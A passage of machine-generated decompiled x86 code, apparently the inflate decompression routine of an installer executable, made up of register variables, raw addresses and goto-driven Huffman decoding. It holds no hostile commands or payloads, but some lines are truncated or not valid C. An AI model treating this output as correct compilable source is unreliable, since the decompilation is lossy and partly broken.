                                                                                                                                                                              												if(__ebx >= __eax) {
                                                                                                                                                                              													break;
                                                                                                                                                                              												}
                                                                                                                                                                              												L114:
                                                                                                                                                                              												__eflags =  *(__ebp - 0x34);
                                                                                                                                                                              												if( *(__ebp - 0x34) == 0) {
                                                                                                                                                                              													goto L182;
                                                                                                                                                                              												}
                                                                                                                                                                              												L115:
                                                                                                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                              												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                                                              												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                                                                              												__ecx = __ebx;
                                                                                                                                                                              												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                              												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                                                              												__ebx = __ebx + 8;
                                                                                                                                                                              												__eflags = __ebx;
                                                                                                                                                                              											}
                                                                                                                                                                              											L117:
                                                                                                                                                                              											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                                                                                                              											__esi[1] = __esi[1] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                                                                                                              											__ecx = __eax;
                                                                                                                                                                              											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                                                                              											__ebx = __ebx - __eax;
                                                                                                                                                                              											__eflags = __ebx;
                                                                                                                                                                              											__eax = __esi[4] & 0x000000ff;
                                                                                                                                                                              											__esi[3] = __esi[4] & 0x000000ff;
                                                                                                                                                                              											__eax = __esi[6];
                                                                                                                                                                              											__esi[2] = __esi[6];
                                                                                                                                                                              											 *__esi = 3;
                                                                                                                                                                              											goto L118;
                                                                                                                                                                              										case 3:
                                                                                                                                                                              											L118:
                                                                                                                                                                              											__eax = __esi[3];
                                                                                                                                                                              											while(1) {
                                                                                                                                                                              												L121:
                                                                                                                                                                              												__eflags = __ebx - __eax;
                                                                                                                                                                              												if(__ebx >= __eax) {
                                                                                                                                                                              													break;
                                                                                                                                                                              												}
                                                                                                                                                                              												L119:
                                                                                                                                                                              												__eflags =  *(__ebp - 0x34);
                                                                                                                                                                              												if( *(__ebp - 0x34) == 0) {
                                                                                                                                                                              													goto L182;
                                                                                                                                                                              												}
                                                                                                                                                                              												L120:
                                                                                                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                              												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                                                              												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                                                                              												__ecx = __ebx;
                                                                                                                                                                              												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                              												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                                                              												__ebx = __ebx + 8;
                                                                                                                                                                              												__eflags = __ebx;
                                                                                                                                                                              											}
                                                                                                                                                                              											L122:
                                                                                                                                                                              											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                                                                                                                                                                              											__eax = __eax &  *(__ebp - 0x40);
                                                                                                                                                                              											__ecx = __esi[2];
                                                                                                                                                                              											__eax = __esi[2] + __eax * 4;
                                                                                                                                                                              											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                                                                                                              											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                                                                              											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                                                                                                              											__ecx =  *__eax & 0x000000ff;
                                                                                                                                                                              											__eflags = __cl & 0x00000010;
                                                                                                                                                                              											if((__cl & 0x00000010) == 0) {
                                                                                                                                                                              												L124:
                                                                                                                                                                              												__eflags = __cl & 0x00000040;
                                                                                                                                                                              												if((__cl & 0x00000040) != 0) {
                                                                                                                                                                              													goto L9;
                                                                                                                                                                              												}
                                                                                                                                                                              												L125:
                                                                                                                                                                              												__esi[3] = __ecx;
                                                                                                                                                                              												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                                                                                                                                              												__esi[2] = __eax;
                                                                                                                                                                              												goto L180;
                                                                                                                                                                              											}
                                                                                                                                                                              											L123:
                                                                                                                                                                              											__esi[2] = __ecx;
                                                                                                                                                                              											__esi[3] = __eax;
                                                                                                                                                                              											 *__esi = 4;
                                                                                                                                                                              											goto L180;
                                                                                                                                                                              										case 4:
                                                                                                                                                                              											L126:
                                                                                                                                                                              											__eax = __esi[2];
                                                                                                                                                                              											while(1) {
                                                                                                                                                                              												L129:
                                                                                                                                                                              												__eflags = __ebx - __eax;
                                                                                                                                                                              												if(__ebx >= __eax) {
                                                                                                                                                                              													break;
                                                                                                                                                                              												}
                                                                                                                                                                              												L127:
                                                                                                                                                                              												__eflags =  *(__ebp - 0x34);
                                                                                                                                                                              												if( *(__ebp - 0x34) == 0) {
                                                                                                                                                                              													goto L182;
                                                                                                                                                                              												}
                                                                                                                                                                              												L128:
                                                                                                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                              												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                                                              												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                                                                              												__ecx = __ebx;
                                                                                                                                                                              												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                              												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                                                              												__ebx = __ebx + 8;
                                                                                                                                                                              												__eflags = __ebx;
                                                                                                                                                                              											}
                                                                                                                                                                              											L130:
                                                                                                                                                                              											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                                                                                                              											__esi[3] = __esi[3] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                                                                                                              											__ecx = __eax;
                                                                                                                                                                              											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                                                                              											__ebx = __ebx - __eax;
                                                                                                                                                                              											__eflags = __ebx;
                                                                                                                                                                              											 *__esi = 5;
                                                                                                                                                                              											goto L131;
                                                                                                                                                                              										case 5:
                                                                                                                                                                              											L131:
                                                                                                                                                                              											__eax =  *(__ebp - 0x30);
                                                                                                                                                                              											__edx = __esi[3];
                                                                                                                                                                              											__eax = __eax - __esi;
                                                                                                                                                                              											__ecx = __eax - __esi - 0x1ba0;
                                                                                                                                                                              											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                                                                                                                                              											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                                                                                                                                              												__ecx = __eax;
                                                                                                                                                                              												__ecx = __eax - __edx;
                                                                                                                                                                              												__eflags = __ecx;
                                                                                                                                                                              											} else {
                                                                                                                                                                              												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                                                                                                                                              												__ecx = __esi[0x26e8] - __edx - __esi;
                                                                                                                                                                              												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                                                                                                                                              											}
                                                                                                                                                                              											__eflags = __esi[1];
                                                                                                                                                                              											 *(__ebp - 0x20) = __ecx;
                                                                                                                                                                              											if(__esi[1] != 0) {
                                                                                                                                                                              												L135:
                                                                                                                                                                              												__edi =  *(__ebp - 0x2c);
                                                                                                                                                                              												do {
                                                                                                                                                                              													L136:
                                                                                                                                                                              													__eflags = __edi;
                                                                                                                                                                              													if(__edi != 0) {
                                                                                                                                                                              														goto L152;
                                                                                                                                                                              													}
                                                                                                                                                                              													L137:
                                                                                                                                                                              													__edi = __esi[0x26e8];
                                                                                                                                                                              													__eflags = __eax - __edi;
                                                                                                                                                                              													if(__eax != __edi) {
                                                                                                                                                                              														L143:
                                                                                                                                                                              														__esi[0x26ea] = __eax;
                                                                                                                                                                              														__eax = E00407217( *((intOrPtr*)(__ebp + 8)));
                                                                                                                                                                              														__eax = __esi[0x26ea];
                                                                                                                                                                              														__ecx = __esi[0x26e9];
                                                                                                                                                                              														__eflags = __eax - __ecx;
                                                                                                                                                                              														 *(__ebp - 0x30) = __eax;
                                                                                                                                                                              														if(__eax >= __ecx) {
                                                                                                                                                                              															__edi = __esi[0x26e8];
                                                                                                                                                                              															__edi = __esi[0x26e8] - __eax;
                                                                                                                                                                              															__eflags = __edi;
                                                                                                                                                                              														} else {
                                                                                                                                                                              															__ecx = __ecx - __eax;
                                                                                                                                                                              															__edi = __ecx - __eax - 1;
                                                                                                                                                                              														}
                                                                                                                                                                              														__edx = __esi[0x26e8];
                                                                                                                                                                              														__eflags = __eax - __edx;
                                                                                                                                                                              														 *(__ebp - 8) = __edx;
                                                                                                                                                                              														if(__eax == __edx) {
                                                                                                                                                                              															__edx =  &(__esi[0x6e8]);
                                                                                                                                                                              															__eflags = __ecx - __edx;
                                                                                                                                                                              															if(__ecx != __edx) {
                                                                                                                                                                              																__eax = __edx;
                                                                                                                                                                              																__eflags = __eax - __ecx;
                                                                                                                                                                              																 *(__ebp - 0x30) = __eax;
                                                                                                                                                                              																if(__eax >= __ecx) {
                                                                                                                                                                              																	__edi =  *(__ebp - 8);
                                                                                                                                                                              																	__edi =  *(__ebp - 8) - __eax;
                                                                                                                                                                              																	__eflags = __edi;
                                                                                                                                                                              																} else {
                                                                                                                                                                              																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E00407217( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
                                                                                                                                                                              												L13:
                                                                                                                                                                              												__eflags =  *0x42e3a8;
                                                                                                                                                                              												if( *0x42e3a8 != 0) {
                                                                                                                                                                              													L22:
                                                                                                                                                                              													_t412 =  *0x40a42c; // 0x9
                                                                                                                                                                              													_t446[4] = _t412;
                                                                                                                                                                              													_t413 =  *0x40a430; // 0x5
                                                                                                                                                                              													_t446[4] = _t413;
                                                                                                                                                                              													_t414 =  *0x42d224; // 0x42db28
                                                                                                                                                                              													_t446[5] = _t414;
                                                                                                                                                                              													_t415 =  *0x42d220; // 0x42e328
                                                                                                                                                                              													_t446[6] = _t415;
                                                                                                                                                                              													L23:
                                                                                                                                                                              													 *_t446 =  *_t446 & 0x00000000;
                                                                                                                                                                              													goto L180;
                                                                                                                                                                              												} else {
                                                                                                                                                                              													_t26 = _t448 - 8;
                                                                                                                                                                              													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                                                                                                                                              													__eflags =  *_t26;
                                                                                                                                                                              													_t416 = 0x42d228;
                                                                                                                                                                              													goto L15;
                                                                                                                                                                              													L20:
                                                                                                                                                                              													 *_t416 = _t438;
                                                                                                                                                                              													_t416 = _t416 + 4;
                                                                                                                                                                              													__eflags = _t416 - 0x42d6a8;
                                                                                                                                                                              													if(_t416 < 0x42d6a8) {
                                                                                                                                                                              														L15:
                                                                                                                                                                              														__eflags = _t416 - 0x42d464;
                                                                                                                                                                              														_t438 = 8;
                                                                                                                                                                              														if(_t416 > 0x42d464) {
                                                                                                                                                                              															__eflags = _t416 - 0x42d628;
                                                                                                                                                                              															if(_t416 >= 0x42d628) {
                                                                                                                                                                              																__eflags = _t416 - 0x42d688;
                                                                                                                                                                              																if(_t416 < 0x42d688) {
                                                                                                                                                                              																	_t438 = 7;
                                                                                                                                                                              																}
                                                                                                                                                                              															} else {
                                                                                                                                                                              																_t438 = 9;
                                                                                                                                                                              															}
                                                                                                                                                                              														}
                                                                                                                                                                              														goto L20;
                                                                                                                                                                              													} else {
                                                                                                                                                                              														E0040727F(0x42d228, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d224, 0x40a42c, 0x42db28, _t448 - 8);
                                                                                                                                                                              														_push(0x1e);
                                                                                                                                                                              														_pop(_t440);
                                                                                                                                                                              														_push(5);
                                                                                                                                                                              														_pop(_t419);
                                                                                                                                                                              														memset(0x42d228, _t419, _t440 << 2);
                                                                                                                                                                              														_t450 = _t450 + 0xc;
                                                                                                                                                                              														_t442 = 0x42d228 + _t440;
                                                                                                                                                                              														E0040727F(0x42d228, 0x1e, 0, 0x40849c, 0x4084d8, "(\xef\xbf\xbdB", 0x40a430, 0x42db28, _t4
                                                                                                                                                                              														 *0x42e3a8 =  *0x42e3a8 + 1;
                                                                                                                                                                              														__eflags =  *0x42e3a8;
                                                                                                                                                                              														goto L22;
                                                                                                                                                                              													}
                                                                                                                                                                              												}
                                                                                                                                                                              											}
                                                                                                                                                                              											L7:
                                                                                                                                                                              											_t423 = _t411 - 1;
                                                                                                                                                                              											if(_t423 == 0) {
                                                                                                                                                                              												 *_t446 = 0xb;
                                                                                                                                                                              												goto L180;
                                                                                                                                                                              											}
                                                                                                                                                                              											L8:
                                                                                                                                                                              											if(_t423 != 1) {
                                                                                                                                                                              												goto L180;
                                                                                                                                                                              											}
                                                                                                                                                                              											goto L9;
                                                                                                                                                                              										case 9:
                                                                                                                                                                              											while(1) {
                                                                                                                                                                              												L27:
                                                                                                                                                                              												__eflags = __ebx - 0x20;
                                                                                                                                                                              												if(__ebx >= 0x20) {
                                                                                                                                                                              													break;
                                                                                                                                                                              												}
                                                                                                                                                                              												L25:
                                                                                                                                                                              												__eflags =  *(__ebp - 0x34);
                                                                                                                                                                              												if( *(__ebp - 0x34) == 0) {
                                                                                                                                                                              													goto L182;
                                                                                                                                                                              												}
                                                                                                                                                                              												L26:
                                                                                                                                                                              												__eax =  *(__ebp - 0x38);
                                                                                                                                                                              												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                                                              												__ecx = __ebx;
                                                                                                                                                                              												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                              												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                                                              												__ebx = __ebx + 8;
                                                                                                                                                                              												__eflags = __ebx;
                                                                                                                                                                              											}
                                                                                                                                                                              											L28:
                                                                                                                                                                              											__eax =  *(__ebp - 0x40);
                                                                                                                                                                              											__ebx = 0;
                                                                                                                                                                              											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                                                                                                                                              											 *(__ebp - 0x40) = 0;
                                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                                              											__esi[1] = __eax;
                                                                                                                                                                              											if(__eax == 0) {
                                                                                                                                                                              												goto L53;
                                                                                                                                                                              											}
                                                                                                                                                                              											L29:
                                                                                                                                                                              											_push(0xa);
                                                                                                                                                                              											_pop(__eax);
                                                                                                                                                                              											goto L54;
                                                                                                                                                                              										case 0xa:
                                                                                                                                                                              											L30:
                                                                                                                                                                              											__eflags =  *(__ebp - 0x34);
                                                                                                                                                                              											if( *(__ebp - 0x34) == 0) {
                                                                                                                                                                              												goto L182;
                                                                                                                                                                              											}
                                                                                                                                                                              											L31:
                                                                                                                                                                              											__eax =  *(__ebp - 0x2c);
                                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                                              											if(__eax != 0) {
                                                                                                                                                                              												L48:
                                                                                                                                                                              												__eflags = __eax -  *(__ebp - 0x34);
                                                                                                                                                                              												if(__eax >=  *(__ebp - 0x34)) {
                                                                                                                                                                              													__eax =  *(__ebp - 0x34);
                                                                                                                                                                              												}
                                                                                                                                                                              												__ecx = __esi[1];
                                                                                                                                                                              												__eflags = __ecx - __eax;
                                                                                                                                                                              												__edi = __ecx;
                                                                                                                                                                              												if(__ecx >= __eax) {
                                                                                                                                                                              													__edi = __eax;
                                                                                                                                                                              												}
                                                                                                                                                                              												__eax = E00405DA5( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                                                                                                                                              												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                                                                                                                                              												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                                                                                                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                                                                                                                                              												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                                                                                                                                              												_t80 =  &(__esi[1]);
                                                                                                                                                                              												 *_t80 = __esi[1] - __edi;
                                                                                                                                                                              												__eflags =  *_t80;
                                                                                                                                                                              												if( *_t80 == 0) {
                                                                                                                                                                              													L53:
                                                                                                                                                                              													__eax = __esi[0x145];
                                                                                                                                                                              													L54:
                                                                                                                                                                              													 *__esi = __eax;
                                                                                                                                                                              												}
                                                                                                                                                                              												goto L180;
                                                                                                                                                                              											}
                                                                                                                                                                              											L32:
                                                                                                                                                                              											__ecx = __esi[0x26e8];
                                                                                                                                                                              											__edx =  *(__ebp - 0x30);
                                                                                                                                                                              											__eflags = __edx - __ecx;
                                                                                                                                                                              											if(__edx != __ecx) {
                                                                                                                                                                              												L38:
                                                                                                                                                                              												__esi[0x26ea] = __edx;
                                                                                                                                                                              												__eax = E00407217( *((intOrPtr*)(__ebp + 8)));
                                                                                                                                                                              												__edx = __esi[0x26ea];
                                                                                                                                                                              												__ecx = __esi[0x26e9];
                                                                                                                                                                              												__eflags = __edx - __ecx;
                                                                                                                                                                              												 *(__ebp - 0x30) = __edx;
                                                                                                                                                                              												if(__edx >= __ecx) {
                                                                                                                                                                              													__eax = __esi[0x26e8];
                                                                                                                                                                              													__eax = __esi[0x26e8] - __edx;
                                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                                              												} else {
                                                                                                                                                                              													__ecx = __ecx - __edx;
                                                                                                                                                                              													__eax = __ecx - __edx - 1;
                                                                                                                                                                              												}
                                                                                                                                                                              												__edi = __esi[0x26e8];
                                                                                                                                                                              												 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                              												__eflags = __edx - __edi;
                                                                                                                                                                              												if(__edx == __edi) {
                                                                                                                                                                              													__edx =  &(__esi[0x6e8]);
                                                                                                                                                                              													__eflags = __edx - __ecx;
                                                                                                                                                                              													if(__eflags != 0) {
                                                                                                                                                                              														 *(__ebp - 0x30) = __edx;
                                                                                                                                                                              														if(__eflags >= 0) {
                                                                                                                                                                              															__edi = __edi - __edx;
                                                                                                                                                                              															__eflags = __edi;
                                                                                                                                                                              															__eax = __edi;
                                                                                                                                                                              														} else {
                                                                                                                                                                              															__ecx = __ecx - __edx;
                                                                                                                                                                              															__eax = __ecx;
                                                                                                                                                                              														}
                                                                                                                                                                              														 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                              													}
                                                                                                                                                                              												}
                                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                                              												if(__eax == 0) {
                                                                                                                                                                              													goto L183;
                                                                                                                                                                              												} else {
                                                                                                                                                                              													goto L48;
                                                                                                                                                                              												}
                                                                                                                                                                              											}
                                                                                                                                                                              											L33:
                                                                                                                                                                              											__eax = __esi[0x26e9];
                                                                                                                                                                              											__edi =  &(__esi[0x6e8]);
                                                                                                                                                                              											__eflags = __eax - __edi;
                                                                                                                                                                              											if(__eax == __edi) {
                                                                                                                                                                              												goto L38;
                                                                                                                                                                              											}
                                                                                                                                                                              											L34:
                                                                                                                                                                              											__edx = __edi;
                                                                                                                                                                              											__eflags = __edx - __eax;
                                                                                                                                                                              											 *(__ebp - 0x30) = __edx;
                                                                                                                                                                              											if(__edx >= __eax) {
                                                                                                                                                                              												__ecx = __ecx - __edx;
                                                                                                                                                                              												__eflags = __ecx;
                                                                                                                                                                              												__eax = __ecx;
                                                                                                                                                                              											} else {
                                                                                                                                                                              												__eax = __eax - __edx;
                                                                                                                                                                              												__eax = __eax - 1;
                                                                                                                                                                              											}
                                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                                              											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                              											if(__eax != 0) {
                                                                                                                                                                              												goto L48;
                                                                                                                                                                              											} else {
                                                                                                                                                                              												goto L38;
                                                                                                                                                                              											}
                                                                                                                                                                              										case 0xb:
                                                                                                                                                                              											goto L56;
                                                                                                                                                                              										case 0xc:
                                                                                                                                                                              											L60:
                                                                                                                                                                              											__esi[1] = __esi[1] >> 0xa;
                                                                                                                                                                              											__eax = (__esi[1] >> 0xa) + 4;
                                                                                                                                                                              											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                                                                                                              												goto L68;
                                                                                                                                                                              											}
                                                                                                                                                                              											goto L61;
                                                                                                                                                                              										case 0xd:
                                                                                                                                                                              											while(1) {
                                                                                                                                                                              												L93:
                                                                                                                                                                              												__eax = __esi[1];
                                                                                                                                                                              												__ecx = __esi[2];
                                                                                                                                                                              												__edx = __eax;
                                                                                                                                                                              												__eax = __eax & 0x0000001f;
                                                                                                                                                                              												__edx = __edx >> 5;
                                                                                                                                                                              												__eax = __edx + __eax + 0x102;
                                                                                                                                                                              												__eflags = __esi[2] - __eax;
                                                                                                                                                                              												if(__esi[2] >= __eax) {
                                                                                                                                                                              													break;
                                                                                                                                                                              												}
                                                                                                                                                                              												L73:
                                                                                                                                                                              												__eax = __esi[0x143];
                                                                                                                                                                              												while(1) {
                                                                                                                                                                              													L76:
                                                                                                                                                                              													__eflags = __ebx - __eax;
                                                                                                                                                                              													if(__ebx >= __eax) {
                                                                                                                                                                              														break;
                                                                                                                                                                              													}
                                                                                                                                                                              													L74:
                                                                                                                                                                              													__eflags =  *(__ebp - 0x34);
                                                                                                                                                                              													if( *(__ebp - 0x34) == 0) {
                                                                                                                                                                              														goto L182;
                                                                                                                                                                              													}
                                                                                                                                                                              													L75:
                                                                                                                                                                              													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                              													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                                                              													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                                                                              													__ecx = __ebx;
                                                                                                                                                                              													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                              													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                              													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                                                              													__ebx = __ebx + 8;
                                                                                                                                                                              													__eflags = __ebx;
                                                                                                                                                                              												}
                                                                                                                                                                              												L77:
                                                                                                                                                                              												__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                                                                                                                                                                              												__eax = __eax &  *(__ebp - 0x40);
                                                                                                                                                                              												__ecx = __esi[0x144];
                                                                                                                                                                              												__eax = __esi[0x144] + __eax * 4;
                                                                                                                                                                              												__edx =  *(__eax + 1) & 0x000000ff;
                                                                                                                                                                              												__eax =  *(__eax + 2) & 0x0000ffff;
                                                                                                                                                                              												__eflags = __eax - 0x10;
                                                                                                                                                                              												 *(__ebp - 0x14) = __eax;
                                                                                                                                                                              												if(__eax >= 0x10) {
                                                                                                                                                                              													L79:
                                                                                                                                                                              													__eflags = __eax - 0x12;
                                                                                                                                                                              													if(__eax != 0x12) {
                                                                                                                                                                              														__eax = __eax + 0xfffffff2;
                                                                                                                                                                              														 *(__ebp - 8) = 3;
                                                                                                                                                                              													} else {
                                                                                                                                                                              														_push(7);
                                                                                                                                                                              														 *(__ebp - 8) = 0xb;
                                                                                                                                                                              														_pop(__eax);
                                                                                                                                                                              													}
                                                                                                                                                                              													while(1) {
                                                                                                                                                                              														L84:
                                                                                                                                                                              														__ecx = __eax + __edx;
                                                                                                                                                                              														__eflags = __ebx - __eax + __edx;
                                                                                                                                                                              														if(__ebx >= __eax + __edx) {
                                                                                                                                                                              															break;
                                                                                                                                                                              														}
                                                                                                                                                                              														L82:
                                                                                                                                                                              														__eflags =  *(__ebp - 0x34);
                                                                                                                                                                              														if( *(__ebp - 0x34) == 0) {
                                                                                                                                                                              															goto L182;
                                                                                                                                                                              														}
                                                                                                                                                                              														L83:
                                                                                                                                                                              														__ecx =  *(__ebp - 0x38);
                                                                                                                                                                              														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                                                              														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                                                                              														__ecx = __ebx;
                                                                                                                                                                              														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                              														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                              														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                                                              														__ebx = __ebx + 8;
                                                                                                                                                                              														__eflags = __ebx;
                                                                                                                                                                              													}
                                                                                                                                                                              													L85:
                                                                                                                                                                              													__ecx = __edx;
                                                                                                                                                                              													__ebx = __ebx - __edx;
                                                                                                                                                                              													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                                                                              													 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
